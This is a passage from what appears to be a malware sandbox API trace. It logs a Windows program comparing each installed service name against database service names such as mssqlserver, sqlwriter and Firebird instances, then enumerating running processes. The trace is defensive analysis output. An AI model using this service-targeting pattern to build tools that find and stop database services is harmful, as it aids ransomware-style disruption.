(lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0286.360] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0286.360] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0286.360] lstrlenW (lpString="LSM") returned 3 [0286.360] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0286.360] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0286.360] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0286.360] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0286.360] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0286.360] lstrlenW (lpString="MpsSvc") returned 6 [0286.360] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0286.360] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0286.360] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0286.360] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0286.360] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0286.360] lstrlenW (lpString="NcbService") returned 10 [0286.360] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0286.360] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0286.360] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0286.360] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0286.361] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0286.361] lstrlenW (lpString="netprofm") returned 8 [0286.361] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0286.361] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0286.361] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0286.361] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0286.361] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0286.361] lstrlenW (lpString="NgcSvc") returned 6 [0286.361] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0286.361] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0286.361] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0286.361] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0286.361] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0286.361] lstrlenW (lpString="NlaSvc") returned 6 [0286.361] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0286.361] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0286.361] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0286.361] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0286.361] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0286.361] lstrlenW (lpString="nsi") returned 3 [0286.361] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0286.361] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0286.361] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0286.361] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0286.361] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0286.361] lstrlenW (lpString="PcaSvc") returned 6 [0286.361] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0286.361] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0286.361] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0286.361] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0286.361] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0286.361] lstrlenW (lpString="PlugPlay") returned 8 [0286.361] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0286.362] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0286.362] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0286.362] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0286.362] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0286.362] lstrlenW (lpString="Power") returned 5 [0286.362] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0286.362] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0286.362] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0286.362] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0286.362] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0286.362] lstrlenW (lpString="ProfSvc") returned 7 [0286.362] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0286.362] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0286.362] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0286.362] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0286.362] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0286.362] lstrlenW (lpString="RpcEptMapper") returned 12 [0286.362] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0286.362] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0286.362] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0286.362] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0286.362] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0286.362] lstrlenW (lpString="RpcSs") returned 5 [0286.362] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0286.362] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0286.362] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0286.362] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0286.362] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0286.362] lstrlenW (lpString="SamSs") returned 5 [0286.362] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0286.362] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0286.362] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0286.362] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0286.363] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0286.363] lstrlenW (lpString="Schedule") returned 8 [0286.363] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0286.363] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0286.363] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0286.363] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0286.363] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0286.363] lstrlenW (lpString="SecurityHealthService") returned 21 [0286.363] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0286.363] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0286.363] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0286.363] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0286.363] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0286.363] lstrlenW (lpString="SENS") returned 4 [0286.363] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0286.363] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0286.363] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0286.363] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0286.363] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0286.363] lstrlenW (lpString="ShellHWDetection") returned 16 [0286.363] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0286.363] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0286.363] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0286.363] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0286.363] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0286.363] lstrlenW (lpString="Spooler") returned 7 [0286.363] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0286.363] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0286.364] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0286.364] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0286.364] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0286.364] lstrlenW (lpString="StateRepository") returned 15 [0286.364] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0286.364] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0286.364] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0286.364] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0286.364] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0286.364] lstrlenW (lpString="SysMain") returned 7 [0286.364] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0286.364] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0286.364] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0286.364] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0286.364] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0286.364] lstrlenW (lpString="SystemEventsBroker") returned 18 [0286.364] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0286.364] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0286.364] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0286.364] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0286.364] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0286.364] lstrlenW (lpString="Themes") returned 6 [0286.364] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0286.364] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0286.364] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0286.364] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0286.364] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0286.365] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0286.365] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0286.365] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0286.365] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0286.365] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0286.365] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="tiledatamodelsvc") returned -1 [0286.365] lstrlenW (lpString="TimeBrokerSvc") returned 13 [0286.365] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0286.365] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0286.365] lstrcmpiW (lpString1="sqlwriter", lpString2="TimeBrokerSvc") returned -1 [0286.365] lstrcmpiW (lpString1="mssqlserver", lpString2="TimeBrokerSvc") returned -1 [0286.365] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x560fa8 | out: hHeap=0x470000) returned 1 [0286.365] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x348 [0286.421] Process32FirstW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.422] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0286.422] lstrlenW (lpString="System") returned 6 [0286.422] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0286.423] lstrlenW (lpString="smss.exe") returned 8 [0286.423] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0286.424] lstrlenW (lpString="csrss.exe") returned 9 [0286.424] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0286.424] lstrlenW (lpString="wininit.exe") returned 11 [0286.424] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0286.425] lstrlenW (lpString="csrss.exe") returned 9 [0286.425] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0286.425] lstrlenW (lpString="winlogon.exe") returned 12 [0286.425] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0286.426] lstrlenW (lpString="services.exe") returned 12 [0286.426] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0286.426] lstrlenW (lpString="lsass.exe") returned 9 [0286.426] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0286.427] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0286.427] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0286.427] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0286.427] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.428] lstrlenW (lpString="svchost.exe") returned 11 [0286.428] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.430] lstrlenW (lpString="svchost.exe") returned 11 [0286.430] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0286.430] lstrlenW (lpString="dwm.exe") returned 7 [0286.431] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.431] lstrlenW (lpString="svchost.exe") returned 11 [0286.431] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.432] lstrlenW (lpString="svchost.exe") returned 11 [0286.432] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3f, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.432] lstrlenW (lpString="svchost.exe") returned 11 [0286.432] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x16c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.433] lstrlenW (lpString="svchost.exe") returned 11 [0286.433] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.433] lstrlenW (lpString="svchost.exe") returned 11 [0286.433] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x490, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.434] lstrlenW (lpString="svchost.exe") returned 11 [0286.434] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x52c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.434] lstrlenW (lpString="svchost.exe") returned 11 [0286.434] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.435] lstrlenW (lpString="svchost.exe") returned 11 [0286.435] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.436] lstrlenW (lpString="svchost.exe") returned 11 [0286.436] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.436] lstrlenW (lpString="svchost.exe") returned 11 [0286.436] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0286.437] lstrlenW (lpString="spoolsv.exe") returned 11 [0286.437] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.438] lstrlenW (lpString="svchost.exe") returned 11 [0286.438] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0286.438] lstrlenW (lpString="audiodg.exe") returned 11 [0286.438] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0286.439] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0286.439] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0286.439] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0286.439] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0286.440] lstrlenW (lpString="Memory Compression") returned 18 [0286.440] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3e4, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0286.440] lstrlenW (lpString="taskhostw.exe") returned 13 [0286.440] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0286.441] lstrlenW (lpString="sihost.exe") returned 10 [0286.441] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.441] lstrlenW (lpString="svchost.exe") returned 11 [0286.441] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x900, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3e4, pcPriClassBase=6, dwFlags=0x0, szExeFile="MDMAgent.exe")) returned 1 [0286.442] lstrlenW (lpString="MDMAgent.exe") returned 12 [0286.442] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0286.442] lstrlenW (lpString="taskhostw.exe") returned 13 [0286.442] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0xa10, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0286.443] lstrlenW (lpString="explorer.exe") returned 12 [0286.443] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0286.443] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0286.443] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0286.445] lstrlenW (lpString="SearchUI.exe") returned 12 [0286.445] Process32NextW (in: hSnapshot=0x348, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x744, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0286.446] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0286.446] Process32NextW (in: 